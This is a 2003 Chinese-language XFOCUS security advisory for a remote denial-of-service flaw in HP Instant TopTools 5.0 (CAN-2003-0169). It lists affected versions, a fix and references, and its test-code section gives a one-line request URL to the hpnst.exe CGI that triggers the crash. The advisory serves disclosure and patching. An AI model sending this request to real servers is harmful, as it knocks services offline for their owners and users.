xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

HP Instant TopTools远程拒绝服务漏洞


发布时间:2003-03-31
更新时间:2003-04-01
严重程度:
威胁程度:远程拒绝服务
错误类型:设计错误
利用方式:服务器模式

BUGTRAQ ID:7246
CVE(CAN) ID:CAN-2003-0169

受影响系统
HP Instant TopTools 5.0 4
详细描述
Instant TopTools没有正确处理一些类型的请求。远程攻击者可以利用这个漏洞对主机进行拒绝服务攻击。

测试代码
http://www.example.com/cgi-bin/hpnst.exe?c=p+i=hpnst.exe

解决方案
HP Instant TopTools 5.0 4:
      HP Upgrade HP Instant TopTools 5.55
      http://h20004.www2.hp.com/soar_rnotes/bsdmatrix/
      matrix50459en_US.html#Utility%20-%20HP%20Instant%20Toptools

相关信息
报告:Erik Parker <erik.parker@digitaldefense.net>
相关资料:http://online.securityfocus.com/advisories/5216
          http://online.securityfocus.com/archive/1/316954
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved